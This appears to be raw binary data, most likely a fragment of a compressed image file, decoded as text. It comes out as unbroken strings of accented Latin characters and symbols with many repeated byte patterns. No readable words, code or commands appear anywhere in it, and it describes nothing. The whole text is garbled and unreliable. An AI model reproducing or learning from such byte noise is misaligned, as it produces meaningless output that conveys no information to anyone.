·×ܕµï{Nõ‹µîL d)îé”Ñ—ý°#xäŒÑЎ‹Ç³N›ëÞý׺¼_åëüç»Wãmnß됵™îÝèE–ŸRi?‹öwZãÁG.ÜÈd+)ŽêÀPÇÇðšú…x¢UZJˆ? ®`å}Á%ºÛ‘bÜ)ZpG?Ò :Iþ >Ðx…1\¢¾SùŽ·né†ë_Ým¶{w¥û[nö^nê![„Üx*i¤‚]'EM
          u,Õ×â38ÙÁ†®†®(jé'VŠhÑÔ¨w
          Öçk»šÇpÚÞ+¨Í
          –´PƒÄH# Ó£DEuŽ
          ž…/ô-Uÿ=ùï“ÿªý£þ²§ü¢÷¯ö:·‚‹¯¡j¯ùè ÿÏ|ŸýWïßÖTÿ”CþõþÇ^ðOñuïô-Uÿ=ùï“ÿªýûúʟòˆÞ¿ØëÞ	þ.½þ…ª¿ç ƒÿ=òõ_¿YSþQû×û{Á?Å׿еWüôç¾Oþ«÷ïë*Ê!ÿzÿc¯x'øº÷úªÿž‚ü÷ÉÿÕ~ýýeOùD?ï_ìuïÿ^ÿBÕ_óÐAÿžù?ú¯ß¿¬©ÿ(‡ýëý޽àŸâëßèZ«þz?óß'ÿUû÷õ•?åÿ½±×¼ü]{ýUÏAþ{äÿê¿~þ²§ü¢÷¯ö:÷‚‹¯¡j¯ùè ÿÏ|ŸýWïßÖTÿ”CþõþÇ^ðOñuïô-Uÿ=ùï“ÿªýûúʟòˆÞ¿ØëÞ	þ.½þ…ª¿ç ƒÿ=òõ_¿YSþQû×û{Á?Å׿еWüôç¾Oþ«÷ïë*Ê!ÿzÿc¯x'øº÷úªÿž‚ü÷ÉÿÕ~ýýeOùD?ï_ìuïÿ^ÿBÕ_óÐAÿžù?ú¯ß¿¬©ÿ(‡ýëý޽àŸâëßèZ«þz?óß'ÿUû÷õ•?åÿ½±×¼ü]{ýUÏAþ{äÿê¿~þ²§ü¢÷¯ö:÷‚‹¯¡j¯ùè ÿÏ|ŸýWïßÖTÿ”CþõþÇ^ðOñuïô-Uÿ=ùï“ÿªýûúʟòˆÞ¿ØëÞ	þ.½þ…ª¿ç ƒÿ=òõ_¿YSþQû×û{Á?ÅÐρÆ6ŽÅ´Â¡¨i’2¡ŒHTŸPBÎV÷ú\û
          ]Î.nfœ-5iéÓÊ(éßÚ~·×½û¯uï~ëÝ{ߺ÷E#±ãôÎËj_ýÀ¤÷ ìßòMµûüxô’Oº5Ô_ð“þ¡ ÿ­Iì/ö²¦?áéPà:¤oš_öPûÇþ 6¯þòøŸyíçüª–éäÿ«ÑMßöíùƒ¢­ìmÒn½ïÝ{¯{÷^ëÞý׺÷¿uæ+ÛÑØÿÌ'…ÿܜŸ³Ý»ýÇÿlÉÓOÇ¢©­¿¯ûÀÿŠ{_ÕzÚ¨?æSuþ#½“ÿ¼Ö3ÜC}þæÞÍWÿ7ÄßoB/´½W¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦ŒÿüXsö¨ÉîÞïö‘ÿ¦áëÈëTïs/F=ÿ‰ÿó;vßý«÷þèë½£¿ÿqdûGøGV_ˆumþÃý;×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uv¿æ@`í{¹ÿ÷k/¼u÷þV‹¯ù¥üttoiý‚ý§£qìҞ½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëßO~ëÝk_ò?ùŽwnúߙÊN¨Ýõ{ל•U܏oÅIg;GI;Ã{3˜–žjá6MSʔÐ<TðÄꌲ:´¯ËîFù¸N›Mã[í¨Ä&Š`
          ³Pžî:A
          ‘SØOh~è¾ÜrÏ+í³óÎÁíÍó¯pg,b…Ø`Š Á)t™3»À¢Šlÿ—¿Î®Ãì½ûH÷J=ϐÍã²U›'w½%%`ÖáhgÊ×`sB†
          ZL„aèçž
          ’‹P’@É#MåS·ÛÎ|Üw=Áv=æ_GV1I@ªjÒ	
          JÔPÖ¢WÞ·îÍÊ|Êòû‘íõ™²´¶š4¼µωcI¡ÖY£"WDxÃʸdè!îwÜÕ×<:÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿u¯vRm:ZzšªJÊ¿º‘âŒS"øÑ+<Ò2¤ZƒzG%ˆ6Ømòn:$ŠºEMÈ<ú«8AR:—¶·
          6æÆŒ•-5],~g€ÇWF/£3Äê̓BuØ0?PAmÞÙ½ŒÞº±¥qþ_CòëÊڅ@éAí'VëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺mÌÓTÖb2””o⫪ÇÖSÒÈ]¢ÔMO$p¹‘xôÈÀꏨöõ³¤wI ¬jàŸ<œu¢*z*ö6ø ¥©®®ÜttT4TóUÖVUî
          ÊjZJZhÚjŠšš‰£H`§‚.îä*¨$±bîûK0U´%‰ ¤þޘðäþ/ç֖_͛ùÄnžéÉn¯7ÖR—¤¨æ®ÛýÙXL­|UÄѳSWáöõY0TRõ›hÞE&u/{Q6Š™Ë”ù>ÚÑ Ý7%¦ŒˆUOзÿøïún“Ü3ˆÝ¾¾¿ìu®×¹¤?¾6w‡Ê®ÈÅõ?AuÞ{±·¶NÓ5Žƒ
          ŽÇù½Íœ¬’›¶p4²J«%mtðS«²¦¢îŠÅÛ¦í·l¶{¹Ý,VãÌñ'Ñ@Ë1ôž®‘¼¥§­ÊþÿÂoú+¨©ðÛ÷æ^Z—¿»!
          ÑÖØi²8ΗÛUk¦AO^Úqۋ²*)¥@KUý†.@Í”¨4̞ëîWÆKm
          ­§ÐÊÃåÅcüªÞa‡!±E¡”êoO/özÙjí=«±vþ/ilµ·övÕÁÒ¥mml6;oíü=d”¤Åá±4Ԙê
          d,mQ¢‹ý=ÄóO5̯=ÄÍ$ÌjY‰f'ԓR>—
          ”Úë}{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷Iå²vobí¬®Ìì
          §¶÷ÆÐÎÓ5oknì3qíì½#Xµ>K
          ˜¦¬ÇVÂH¾™#aq¯· ¸žÖT¸µãMC)*Àüˆ¡h€À†kEóÓþoÓݙM™ì„™š~”ßÅj+äê=Í[‘Éõ&ä¨õJôØ¬Ç#¸úFb‹|Ž(ÇOEåYo–½Ø¿´1ÚófâۇŠ 	Wý0¸ÿyo2Xã¤X«U¢4oO/ö:Ӈ½z¹>3ö6g©ûׯ·[oÜ^¯¸)Db®ä–*|¾%Nõ­Ã®h_íëèg¨£¨
          |r5§·s°Ýí#½Ûn–[fàWÈúÅXy©1Ñc£FÅ]hÝÞ×õN÷ÀOæÝ»föVS%œêýÉ[Kþ’ú¢l­U&tR&ˆ-Œ*ÏyãéE©2	$(Šu–cöA¿rí†ÿ‹ˆ”](ìzWä}TùÌPôìS4G·Ó¯ 'Æ®ÐÁüµéݧÞ]!ØT›£cîÊk£Õl¿˜§Xÿ‹m]ӋQ,¸]̓žAU3’9Y#i ’)_7f¶Ù/çÛ·—(hÃɔ×*|ähAÚ=R(tzƒÐñþŽûþwQÿçë!ÿ^}—~øÙÿåÿ¼/ùú¿‡'ñuïôwØóºÿ?Yúóïß¾6ùF?ïþ~½áÉü]{ýöüî£ÿÏÖCþ¼û÷þQûÂÿŸ¯xr^ÿG}‡ÿ;¨ÿóõÿ¯>ýûãgÿ”cþð¿çëÞŸÅ׿ÑßaÿÎê?üýd?ëÏ¿~øÙÿåÿ¼/ùú÷‡'ñu?°÷Ý.SUU—I)i«è穏ø½|šà†¢9&OÄõF¤Xð~žÙŸvÚ¤‚dKrØ¼Hǟ[¸ “އi‘¤†TSfxÝ’@Ê@$‹‘b}…”€ÊO
          ôÿEãýï¯ùÜÑç×%ÿÔ~Æ¿6¿ùGo÷•ÿ?Iü'õëßèÇ}Îæ‹ÿ>¹/þ£÷ïߛ_ü£·ûÊÿŸ¯xOë׿юúÿÍþ}r_ýGïß¿6¿ùGo÷•ÿ?^ðŸ×ªDþc»·µ¶ßmPu¦O?˜ÇíZ-«ˆÎãèqÙ<Œ8Ììù9«’§-PoO÷òRÔRµ*°˜@ܶ.{ÕÌۍ×0AµÛK$;Dp#*Àìŵ;i=Ô#JԐºM,kÕ¿¸÷!òc{u{Î2mÖ×\Õ6á42K",n‘,z!P>eoÊоµHD
          `–žk¶ûClv.¿?‘Èíí‘W¶†!œÊd¤4²æâÍì%%c%SÏMK2VV¦ó~Š=Œ=‘æ›ÉvýâÃxi'´£0³
          Eu֚˜Ô¨Ò¥E{j|ˆêûör7(rï0òVûËÖ6ö›ÎåȺŠ%TY&
          vØÉ"3Ò²h©F=Y×ú1ß_ó¹¢ÿÏ®Kÿ¨ýο6¿ùGo÷•ÿ?Xá?¯^ÿF;ëþw4_ùõÉõ¿~üÚÿå¿ÞWüý{Â^½þŒw×üîh¿óë’ÿê?~ýùµÿÊ;¼¯ùú÷„þ½ÛlgvçñoãUÕýçØ}·†ª¦§Çöÿ{æÕ÷Å£_-kÞÜý²mÚúÖ÷éþš2ºuV 4§}NF¬µÔz}“tç^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝŽÅÿÓ9ÿ-©÷“܃³É6×ì?ñãÒI>6è×QÀ:Oú†ƒþµ'°¿ÚÉþ˜ÿ‡¥C€ê‘¾iÙCïú€Ú¿ûËâ}äW·ŸòªX§“þ®7E7Û·åþŠ·±·Iº÷¿uî½ïÝ{¯{÷^ëÞý׺ªÏ˜ßó7£ÿÃOÿ¹9?g›qÜÿ¦?äé·ãÑSö¾£ªu´'P̦êÿüG{'ÿy¬g¸Š÷ýÍ»ÿš¯ÿ= o‰¾Þ„_iz¯^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦ŒÿüXsö¨ÉîÞïö‘ÿ¦áëÈëTßsF]ÿ‰ÿó;vßý«÷þè뽤¾ÿqŸíáëkÄunȺw¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^êìþ̀ÀÿÚ÷sÿîÖ_xëî7ü­_óJ?øèèÞÓûûOFãØ¥={ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×LªêÊÀ2°*ÊEÃ) ƒÁ~ãƒÃ­‚T†„uª?Èÿ‡»Ñ›÷9‹§Ù›—rlIòUrìýá‚ÄWæqµØY§wÇSäª1ðTŒ^rš„SÓÔxݤFx¼‘‘±7™93xØ·	â[)e°,|9K)Rp€t° Ó ‘QC×r=¡ûÁò¹|¯¶ÞËÌVv|ΰ¨ºµšT†D˜(4jì¾$,Õd‘5¤+épÊ_ò×ø‘Ùt]«Œïmÿ¶rû3mm
          ÀÚ´›††£–Ü¹Ìæ&³÷bkc†¶<&?“ž_¹•&œÄ!ò#F4öӔ74ݢ߷W†Úo8*ÎÌ¥jÐé
          ÄÔÒ¦”®i_|/~9:ã’/}²å]æßqÞ/å‹êZYb·†Rm-*†g’4_
          I*‚C&‚P5÷{Ÿºåß^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½Ó6g;†ÁA¹šØi"™"YI^b€	1Ë,¤‹ý}©¶µ¹ºb¶ÑaÇʟ™ ëE‚ñ=gÅe±™ªAYЫЮ—Y‹\A—C RcxäT’'
          ÀéeÄ¡÷Ií經øŒ¬œsþùõàA9{g­õï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ6fEiÄe7_ñ¬>2¡þðÓÉöڐ¼Öµø¿×ÛöÞÔAãc¬jû+Ÿå֍hiÇ­*¿ž_óSÞÙ\†ìø-ÓûÚµ0øédÃ|ŠÝ8|Œ%²Ù(šÕ}CÈcŸGðÌs€»‹D„ÏR9ô¤5‘M‘\‹Éûr­¿0Mfºt ƒå%™üáÜ8©7˜ƒ}¿æëVOr¿Hz²å¹ü²»¯ùŒvl˜=ž²lΠÚu”ƒ´»—)–§	¶`˜,ëÀÓ)—soœ)ÕOŽTX‘–j©!„«8O›9»oå[1$ÿ©|àøq–ùŸáAæÔÏ	éDï;PaG×ÐÓâ/Ã/ÿz²‡ª:eÓmì`Zi÷6æ­×omÿ›‚›‹{n?5Œ”…ÜǬTTHæ*H „,c7Íÿsæ+ƽÜî?áQ„Aü(¾Cö“ʼn9èê(’%҃ýžG²nœëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺'Ÿ4>üzùßÕÕ=iÞ»N*é©b«—eïì:SQoîºÌTÆ«ü[igžžw$x£5T3¬ØúåV¢4!S݃˜÷N[¼{lôšÐåz0ÿaäGMK
          Lº\~~c¯÷ó	þ]]áü¼;i¶'eÒÿx¶.ᒶ¯«{sCQOµ»Lëä@’=Gð-يŽh×'ˆšY%¥wWç¥’
          ™²—•ù«n曩´:.V‚H‰îCþU?…€¡ó‚,Ð<
          Fáä}z ÄÝ1՞,æCØ¿Ëÿ¸V¢,Îj³¢;º‚‡·¶M¦tFM=ûÛ´R–†-Û¶c”µ”/ñ0ô²LÀæžV±æ;Aã@†ú |6?ÍIþþG#Ìà¡lÓǯ ÆÎÝ[ë°¶žÚß{#>ûŸgo/sm}LJÈbªñyÌnŠŽ+)AR’éš–ºŠ¡$CÁ³rãÞ;ÏÅk<Ö×*Oe!
          8âFÀÊÀpzRx;‹ýVSÿ:1ŸõóÛZ¹sÒ?Øßæë­óëÞâÿU”ÿΌgý|÷í\¹éìoóuïÖùõïqªÊçF3þ¾{ö®\ôö7ùº÷ë|ú÷ƒ¸¿Õe?ó£ÿ_=ûW.zGûüÝ{õ¾}{ÁÜ_겟ùьÿ¯žý«—=#ýþn½úß>½àî/õYOüèÆ×Ï~Õ˞‘þÆÿ7^ýoŸ^ðwú¬§þtc?ëç¿jåÏHÿc›¯~·Ï¯x;‹ýVSÿ:1Ÿõóßµr礱¿Í׿[ç×¼Åþ«)ÿÏúùïÚ¹sÒ?Øßæëß­óè%í^‚—»©1ô}§±aÞ	‰i[Q]5=&K*4ˆ¨²øºê­-=I‰‘$Â9
          )e%E‰wƒ÷øã‹w°†eCÚQXW
          °ÌV‡Ìt>äOt}ÄöÎæêë‘ùšâÁçHª#’94×IxfI"fZ,P²‚@ ғ¯úÇtu^ܧÚ]w¶híÚy¥©\fc!ŽZ¹‚,Õµ“<ÒUW×L‘"¼ó¼’²¢‚Ä(^Û·rfÏj–[m¤0Û)­|“Ä’jXŸV$ðÏDÜÙÎÛÏ[ÄÛÿ7osßîî¡L’h¢´DPF€’B"ªI¤ô¶ðwú¬§þtc?ëçµú¹sÒ?Øßæè5úß>žvô]¢¹¼i˜ðÁTŸ{嚁£ðs«ZÅ!¯úÜûMxÛ¶›éôxú{hçÖ×ÅÔ+Ã¡ËØ_§ú÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uîŠGbÿÇéœÿ–Ô¿ûIîAÙ¿ä›köøñé$Ÿtk¨¿à'ýCAÿZ“Ø
          _ídÿLÃÒ¡ÀuHß4¿ì¡÷ý@m_ýåñ>ò+ÛÏùU,?ÓÉÿW¢›¿íÛòÿE[ØÛ¤Ý{ߺ÷^÷î½×½û¯uï~ëÝU_ÌroGùäð¿û“”öw·‚mÿÛòtÛñè©j_ëþð}®¡êm
          Ôó)z»ÿÖÉÿÞkî$½ÿs.ÿæ«ǏHâo·¡Ú^«×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦ŒÿüXsö¨ÉîÞïö‘ÿ¦áëÈëTmGúŸöþæ:NŒz2_	=ß·9?ñnÜ_Ÿú±×{G|şcü=YxõnžÈzw¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^êìþ̀ÀÿÚ÷sÿîÖ_xëî7ü­_óJ?øèèÞÓûûOFãØ¥={ߺ÷L»‡5ÞÄUeê!–¢*Sh¡($o=DTˤ¹éi7üjlíšòâ;t`«“ßòu¦m žƒ_ô͇ÿFOþK¥ÿ¯žÎÿ«wòŸÏ¦¼aèz÷úfÃÿΣ'ÿ%Òÿ×Ï~þ­ÜÊB>½ãC׿Ó6þu?ù.—þ¾{÷õnãþRùõïz„m·žƒrâ¢ÊÓA-<RË4B)Ê…Ê1&2VĎ=“^Ú=”í°,5>œVÔ+Ó÷´[¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦ŒÎ#
          –§TÍRRÔÁF©:<,ÖV)0hÞ-vمì/íEµÅÍ»“m#+ŸO?ËÏ­Öl^;‹¤ZlM5=-!c*¥0ÜegŒ®Á@ÔI6_uži琽֓†ÁòëÀ(:qöÏ[ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺§çGüÄàgÅúš}•‚Ÿä7v¦Ìê(U£’¯lÓEMîîÎzwº˜öm
          |IE¨2¾b²“TrB“€;äVþ²ïÜ¡;]½_FþÿÛkýÜ
          :Ku?ƒyáþ~¾q•uuUõU5ÕÕ5µµµUÖVUÍ%EU]UD5EMMDÌòÏQ<®Y݉fbI$ŸyXªª¡T PÀˆú=ÿË£à7e0¯xޤÙƧ²°ÉM¸;w²ZŒÕc¶ÉZ³ª¹H+w>zHڗBX5MN©M43Dæ®f´å}­ï§£\7lQօßüŠ8±òâ@/ANáG3é×ғãçÇÞ§ø»Ô{?¤zWjÑ탲ñéG¡§Tzìc…l–àÜM™Ü™Ê½Uµ’ÞIærxPª¸™ºn—»ÅôûŽá1{™
          IòÉTy(p¢,jt4{/êý{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯t]>U|Yéÿ™)ºú+»6ôy½§¹`óPä XbÜ?rSC:a·žÑÉKǹ0rÎÍ¡Z9by)çIi¦š
          v]æûaÜ Ü¶ùt·#ð²ù£5>~˜"„)$k*q޾hÿ9~v—Á›¯¡û>¼þFgco:ZYi°½‡°²àwv!$y|?r)¤‚²—É#Pä žœ»øÄ–Ü»¿Ùó&×åfi\:”qÅOøAóR+Nˆf‰¡rÿÑ?ö{Ó]m“ÿ	âþfu{=«~	öÍuNSZù]Ññã#WZ¨ØŠàµ9çÖI$úÁ¡É(›3ŒŒiT-twc=<k
          {•Ék}"ïöD$´0§Å䯏1ð·¨Óèjcgs¤xM‘åþn¶ÑÿMïùÒVÿçTôg¸‹úµ7ü¥/ì=/ñ‡ðõïôюÿ%oþuAÿF{÷õjoùJ_Øz÷Œ?‡¯¦Œwüé+óªú3ß¿«SÊRþÃ×¼aü={ý4c¿çI[ÿPўýýZ›þR—ö½ãáëßé£ÿ:JßüêƒþŒ÷ïêÔßò”¿°õï^ÿMïùÒVÿçTôg¿V¦ÿ”¥ý‡¯xÃøz÷úhÇΒ·ÿ: ÿ£=ûúµ7ü¥/ì={ÆÃ׿ÓF;þt•¿ùÕýïßÕ©¿å)aëÞ0þ½þš1ßó¤­ÿΨ?èÏ~þ­Mÿ)Kû^ñ‡ðõïôюÿ%oþuAÿF{÷õjoùJ_Øz÷Œ?‡¯¦Œwüé+óªú3ß¿«SÊRþÃ×¼aü={ý4c¿çI[ÿPўýýZ›þR—ö½ãáëßé£ÿ:JßüêƒþŒ÷ïêÔßò”¿°õï^ÿMïùÒVÿçTôg¿V¦ÿ”¥ý‡¯xÃøz÷úhÇΒ·ÿ: ÿ£=ûúµ7ü¥/ì={ÆÃ׿ÓF;þt•¿ùÕýïßÕ©¿å)aëÞ0þ½þš1ßó¤­ÿΨ?èÏ~þ­Mÿ)Kû^ñ‡ðõïôюÿ%oþuAÿF{÷õjoùJ_Øz÷Œ?‡¡k^¹LmI#h’¾Žž­br£Zˆ–PŒÂÀ•
          kûO‚ia&¥Šý†:
          @=Oö×[ëÞý׺÷¿uî½ïÝ{¢‘Ø¿ñúg?åµ/þàR{voù&Úý‡þ<zI'ÆÝê/øIÿPÐÖ¤ö—ûY?Óðô¨pR7Í/û(}ãÿPWÿy|O¼ŠöóþUKôòÕÆè¦ïûvü¿ÁÑVö6é7^÷î½×½û¯uï~ëÝ{ߺ÷UOó+þfüøia?÷')ìïo$[ÿ¶?äé·ãÑPöº§ªu´_Oÿ̤êßüG[#ÿyœg¸’÷ýÌ»ÿš­ÿ= o‰¾Þ„oiz¯^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦ŒÿüXsö¨ÉîÞïö‘ÿ¦áëÈëT_sF]/‰Ÿó;öçý«·þè뽤¾ÿqÛíáëkÇ«uöEÓ½{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷Wgð‹þdþ×»Ÿÿv²ûÇ_q¿åhºÿšQÿÇGFöŸØ/Úz7À½)ëÞý׺cÜu8zL=]FzŸ§û˜¤€Ô£©… ¼ zjOӂ/øöªÍ.$¹-“šÐ֞F¹û+ÕX€®Þ>¤ÿU'þxÛþ½û<ú.`ÿ”†ÿ{ÿg¦õEéüº÷÷©?çUIÿž6ÿ¯~ýô\Áÿ)
          þ÷þÏ^Õ§òëßÞ>¤ÿU'þxÛþ½û÷Ñsü¤7ûßû={T^ŸË¡/lÕa+11O·¡J|cK:Çtÿj¢E‰ˆ„…µßóùöI}Ôw—ŒLô­q垜R¤vðéAí'VëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^é-ºvž?vSÓS×OYOö’<°½$¨£TŠªâX¥ŽX¤^
          ƒ/6 
          ëÂ[w‰Tê5à"„uV@ã=Jۛv‹lc¿†ÐËU4Fg¨g«•dË"¢¶‰q¥£UP/rnI>é{y%ôÞ4ª¡©L!þ¼ªPtÿí'VëÞý׺÷¿uî½ïÝ{¯{÷^ëUU-
          -MumDtTpMUWWU,pSRÒÓÆÓTTTO+$PÁHY݈UPI6÷µRÄ*‚Xš׺ùÿ5š™?1û#µérõžÞ«“®úW!’8(úÏkÖÖC‹Ê%,^ž³yd&©ÍT«ƒ$r×øu†02÷“9}9sa´²dñ†¹O¬ŒE}QÉkæz ¸—Æ•›ððgD'hm-É¿·^ÙØÛ7
          ]¸·vñÏâ6¾×Àc"óäs{ƒ=_O‹Ãâ¨a¸òUä2QŸ˜\bYç†Ú®n$	jY˜ð
          ¢¤ŸéÉëé­ü³>íåùñ‹kõ>:,vG²³ÑÓnÞìÞ´‘ê“töu$b®––®DIßkí8OðìLec_·‰ª5¨©¨gÄNnæIùŸxšõɋۀà‘üMñ7ÌÒ´£ëxD1…ü^oVì/Óý{ߺ÷^÷î½×½û¯uï~ëÝ »Kã:¯®w·cæ!’§²öÖ[pÏGž½ñԒMOŽ‚FVHçÈՁ†•i<ì¿uÜ"Ú¶ÛíÊe&8"g q4|É üúrO+^s¿7rß(íò»Üo"€9$`FJƵrHRzՇ³¾aüŠí-ÑY¹r¥¼vüRUI63nìíŘÚû{O¬µ=.?‡­¤Yš;/ÜNeª’×’F<ûÅMӜ¹uº{™wY£ÕR7dE@#‡©«2zí¿&}ßý¥ä–ßg²ä¾éÂ$÷pEs<ÍNæy%F 1©ðÓLkZ*Õ¢-¯™=Ù¢¿£ûc7W»+¿ÕçvVìÊ?Ÿ<ßÂZ”Ûùšâ<ٍts5U=LåªÃ*I$¢Ê~Úsžá¹]I±nәŸÃ-–íø‘ÁÔçj)…|»ç*ò†ËkîO#m±Ø[}JÃykÓê×ÞáÞ4¢hʪUËÜ¿¹£®zuï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝUó~þ^XŸ¿ó­½£Nþê˜2›Ï¤3ŒÅU]•Ž‘dÍõÍ]d†=^Á££ŽœktŠŸ'Kº8בy¡ùgxåsû²raè+‰õBkóRÉé5ÌhÈáþoϯ›-u
          n.º³“£ªÇäqÕU9
          
          êyi+hki&zzº:ÊYÒ9骩§’HÝUÑԂòÅY]UсB*È ð útGÓþÇޛ—®7–Ôì
          ›”Ÿ	»vNâÃî­µ—§ÒfÇg05ðdñ•ˆ’Ž_e21GŽVIé<1ÜÃ5¼ËXJ‘ê¡ëÀAG_M¯‡ÿ-:CåwÆÞ¦ïŒVÜÅãê7Î×¥Ÿs`épÔõí½íŒy1Ón¤ŒW§ÄîZ˜©ä+ÏJ"šÀH=â®ñ°sÕ¹ÞXýc²FçK#R©ûJ‘_CQÑärÄè­§'åѕþõuGüèé?ô§ÿ£=–}ÿÿ)-ÿ9WÕðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.½ýêêùÑÒè?OÿF{÷Ðoÿò’ßóõíQòëßÞ®¨ÿ'þƒôÿôg¿}ÿÿ)-ÿ9^Õðÿ.Ÿ!í—MTôæ®!b†±ì‘Å(TŽ4V
          ˆŠ,ài[cÜݙÜ)rjIl“ÖüTeÿKCþ;WÿçÿÑÞëûƒqþÿzoÅNŸ0Û¹jå¢ÅÉRóÃLÕN&§hWĒÅ	!‰ ¶¹—inöË«(ÖYÕB¦
          sBÉÖÕՍJïeý_¯{÷^è¤v/ü~™ÏùmKÿ¸žä›þI¶¿aÿ’Iñ·Fº‹þÒÔ4õ©=€¥þÖOôÇü=*TóKþÊxÿÔÕÿÞ_ï"½¼ÿ•RÃý<Ÿõqº)»þÝ¿/ðtU½ºM×½û¯uï~ëÝ{ߺ÷^÷î½ÕSüÊÿ™¿þXOýÉÊ{:°?¡þØÿ“¦ßECÚê^«ÖÑ}?ÿ2“«ñìýæqžâKß÷2ïþj·üxô^ß}½ÞÓu^½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿